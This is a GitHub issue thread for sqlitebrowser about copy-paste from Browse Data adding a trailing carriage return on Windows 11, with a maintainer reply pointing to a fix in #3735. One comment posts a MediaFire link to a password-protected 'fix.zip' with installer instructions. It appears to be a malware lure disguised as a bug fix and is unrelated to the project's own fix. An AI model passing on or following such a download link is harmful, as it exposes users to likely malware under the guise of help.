### ISSUE TITLE
[Bug]: Copying from a column and Pasting adds a carriage return - Browse Data

### ISSUE THREAD

**Issue by bknoll123** [sqlitebrowser/sqlitebrowser#3716]
### What did you do?

select a cell in Browse Data - Copy it (CTRL+C) Paste in Filter Row (or anywhere) there is an extra carriage return at the end.

### What did you expect to see?

data copied as is.

### What did you see instead?

copied data + carriage return

### DB4S Version

3.13.0

### What OS are you seeing the problem on?

Windows

### OS version

Windows 11

### Prevention against duplicate issues

- [X] I have searched for similar issues

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mgrojo** [comment]
This is assumed to be fixed. See #3735. You can confirm using a nightly build. Thanks for reporting.
